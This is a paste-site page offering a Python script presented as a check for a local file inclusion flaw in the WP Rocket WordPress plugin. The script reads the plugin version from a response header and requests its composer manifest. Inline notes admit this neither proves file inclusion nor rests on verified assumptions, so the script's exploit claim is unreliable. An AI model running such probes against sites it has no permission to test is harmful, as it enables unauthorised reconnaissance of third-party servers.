FlyFar

WP Rocket < 2.10.3 - Local File Inclusion (LFI)

Feb 29th, 2024
Python 1.44 KB | Cybersecurity | 0 0
  1.  
  2. import requests
  3. import time
  4.  
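  def check_wp_rocket_version(url, timeout=10.0):
      """Return the WP Rocket version advertised by the site at *url*, or None.

      Requests ``<url>/wp-rocket/css/rocket.css`` and looks for a
      ``WP Rocket/<version>`` token in the ``X-Powered-By`` response header.

      Args:
          url: Base URL of the site; a trailing slash is tolerated.
          timeout: Seconds to wait for the server before giving up, so an
              unresponsive host cannot hang the caller indefinitely.

      Returns:
          The version token (for example ``"2.10.2"``) or None when the
          request fails or the header carries no ``WP Rocket/`` token.

      NOTE(review): nothing on this page establishes that the plugin
      advertises its version in ``X-Powered-By`` or is served from
      ``/wp-rocket/``. Treat None as "unknown", not as "not installed" or
      "patched" - confirm the installed version from the site's plugin list.
      """
      version_url = url.rstrip("/") + "/wp-rocket/css/rocket.css"
      try:
          response = requests.get(version_url, timeout=timeout)
      except requests.RequestException as e:
          print(f"Error occurred while fetching WP Rocket version: {e}")
          return None

      # A missing header is the normal case, not an error: .get() avoids the
      # KeyError that was previously reported as a fetch failure.
      banner = response.headers.get("X-Powered-By", "")
      marker = "WP Rocket/"
      if marker not in banner:
          return None

      # Take the token right after the marker. Splitting the whole header on
      # "/" picks the wrong field when another product (e.g. "PHP/x.y") is
      # listed first, and drags along whatever follows the version.
      tail = banner.split(marker, 1)[1].split()
      return tail[0] if tail else None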
  16.  
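  def test_wp_rocket_lfi_bug(url, timeout=10.0):
      """Report whether the plugin's Composer manifest is readable at *url*.

      Requests ``<url>/wp-rocket/inc/vendor/composer/installed.json`` and
      returns True only for a direct 200 response whose body parses as JSON.

      Args:
          url: Base URL of the site; a trailing slash is tolerated.
          timeout: Seconds to wait for the server before giving up.

      Returns:
          True when the manifest is served as JSON, otherwise False
          (including on any request error).

      NOTE(review): a True result shows that a static file is readable by
      anonymous clients, which is information exposure. It does not by
      itself demonstrate file inclusion, so treat it as a lead to verify
      against the vendor advisory rather than as confirmation. The paste
      title implies 2.10.3 carries the fix - confirm before relying on it.
      """
      lfi_url = url.rstrip("/") + "/wp-rocket/inc/vendor/composer/installed.json"
      try:
          # Redirects are not followed: a 200 reached through a redirect to a
          # landing or login page says nothing about this path.
          response = requests.get(lfi_url, timeout=timeout, allow_redirects=False)
      except requests.RequestException as e:
          print(f"Error occurred while testing LFI: {e}")
          return False

      if response.status_code != 200:
          return False

      # Sites that answer every path with a 200 HTML page would otherwise be
      # reported as affected; the manifest is JSON, so require that it parses.
      try:
          response.json()
      except ValueError:
          return False
      return True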
  26.  
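  def _version_tuple(text):
      """Return the leading dotted-integer version in *text* as a tuple of ints, or None."""
      import re

      found = re.match(r"\s*(\d+(?:\.\d+)*)", text)
      if not found:
          return None
      return tuple(int(part) for part in found.group(1).split("."))


  def main():
      """Check one site, named on the command line, for the WP Rocket issue.

      The base URL is read from ``sys.argv[1]``, so the operator names the
      host explicitly and running the file bare sends no requests anywhere.

      Versions are compared numerically against 2.10.3, following the paste
      title ("WP Rocket < 2.10.3"). The earlier exact-match list treated
      2.10.3 as affected and every release before 2.10.0 as unaffected.
      NOTE(review): confirm the affected range against the vendor advisory.
      """
      import sys

      if len(sys.argv) != 2:
          print(f"Usage: {sys.argv[0]} <base-url>")
          return
      url = sys.argv[1]

      wp_rocket_version = check_wp_rocket_version(url)
      if not wp_rocket_version:
          print("Unable to fetch WP Rocket version")
          return
      print(f"WP Rocket Version: {wp_rocket_version}")

      parsed = _version_tuple(wp_rocket_version)
      if parsed is None:
          # An unparseable banner is "unknown", never "safe".
          print("Unable to parse WP Rocket version")
          return
      if parsed >= (2, 10, 3):
          print("WP Rocket version is not affected by the LFI bug")
          return

      if test_wp_rocket_lfi_bug(url):
          print("LFI vulnerability found in WP Rocket")
      else:
          print("LFI vulnerability not found in WP Rocket")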
  42.  
  # Entry-point guard: run main() only when this file is executed as a
  # script, not when it is imported as a module.
  if __name__ == "__main__":
      main()
  45.            